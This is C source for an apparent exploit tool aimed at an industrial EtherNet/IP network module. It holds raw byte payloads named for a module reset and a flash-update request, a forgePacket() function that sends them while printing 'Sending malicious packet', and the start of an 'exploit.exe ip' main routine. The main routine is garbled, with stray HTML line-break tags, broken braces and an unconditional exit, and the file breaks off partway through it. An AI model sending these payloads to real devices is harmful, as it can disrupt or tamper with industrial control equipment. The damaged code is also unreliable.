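/*
 * Raw request payloads. They are written as string literals, so each array
 * also holds the literal's trailing NUL: sizeof is one more than the number
 * of bytes spelled out below.
 * NOTE(review): presumably these are the `packet` arguments handed to
 * forgePacket(), which prepends the ENCAP_H header; the call sites are not
 * visible in this excerpt -- confirm.
 * Detection note: the bodies are fixed byte strings, which makes them
 * candidate patterns for network signatures on traffic that follows the
 * encapsulation header.
 */

/* 24 payload bytes; the name suggests a reset request for the Ethernet module. */
unsigned char packetResetEth[]=
"\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00"
"\x05\x03\x20\x01\x24\x01\x30\x03";

/* 38 payload bytes; the name suggests a flash-update request. */
unsigned char packetFlashUp[]=
"\x00\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x16\x00"
"\x4b\x02\x20\xa1\x24\x01\x05\x99\x07\x00\x4f\x02\x20\x37\x24\xc8"
"\x00\x00\x01\x00\x01\x00";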
/* ------- */
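/*
 * Wrap a payload in an ENCAP_H header and send it over a connected socket.
 *
 * packet  payload bytes copied directly after the header
 * len     payload length in bytes; also stored in iEncaph_length
 * commID  value stored in iEncaph_command
 * client  connected socket used for the send and for the reply read
 *
 * The header's lEncaph_session field is taken from the global g_SessionId.
 * The return value of send() is only printed (in hex), and up to 0x10 bytes
 * of reply are read and discarded.
 *
 * Returns true after the send and the reply read have been attempted.
 * Returns false if packet is NULL, if header plus payload do not fit the
 * 0x200-byte staging buffer, or if that buffer cannot be allocated.
 */
bool forgePacket( unsigned char *packet, UINT32 len, UINT32 commID, SOCKET client )
{
    enum { REQ_BUF_SIZE = 0x200, REPLY_LEN = 0x10 };
    ENCAP_H header;
    unsigned char *req;
    int sent;

    /* The staging buffer is fixed-size: refuse anything that would overrun it. */
    if( packet == NULL
        || sizeof( ENCAP_H ) > REQ_BUF_SIZE
        || len > REQ_BUF_SIZE - sizeof( ENCAP_H ) )
    {
        return false;
    }

    /* Cast kept so the file still builds if it is compiled as C++. */
    req = ( unsigned char* ) calloc( REQ_BUF_SIZE, 1 );
    if( req == NULL )
    {
        return false;
    }

    /* Zero every byte first so unset fields and padding go out as 0. */
    memset( &header, 0, sizeof( header ) );
    header.iEncaph_command = commID;
    header.iEncaph_length = len;
    header.lEncaph_session = g_SessionId;

    /* Wire layout: header immediately followed by the payload. */
    memcpy( req, &header, sizeof( header ) );
    memcpy( req + sizeof( header ), packet, len );

    printf("[+] Sending malicious packet...");
    /* The flags argument is an int; pass 0 rather than NULL. */
    sent = send( client, (const char*)req, (int)( len + sizeof( header ) ), 0 );
    printf("%X\n", (unsigned int)sent);

    /* Best-effort read of the start of the reply; the result is not inspected. */
    (void)recv( client, (char*)req, REPLY_LEN, 0 );

    free( req );
    return true;
}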
int main(int argc, char* argv[])<br />
{<br />
WSADATA ws;<br />
SOCKET enbt_socket;<br />
struct sockaddr_in peer;<br />
ENCAP_H *pHeader;<br />
REQ_SESSION *pSession;<br />
void *pReply;<br />
void *pReq,*pReq2;<br />
int i;<br />
{<br />
}<br />
if( argc != 2 )<br />
printf("\nusage: exploit.exe ip ");<br />
exit(0);<br />
WSAStartup(0x0202,&ws);<br />
peer.sin_family = AF_INET;<br />
peer.sin_port = htons( ENBT_PORT );<br />
peer.sin_addr.s_addr = inet_addr( argv[1] );<br />
enbt_socket = socket(AF_INET, SOCK_STREAM, 0);<br />
pHeader = ( ENCAP_H* ) calloc( 1, sizeof( ENCAP_H ) );<br />
pSession = ( REQ_SESSION* ) calloc( 1, sizeof ( REQ_SESSION ) );<br />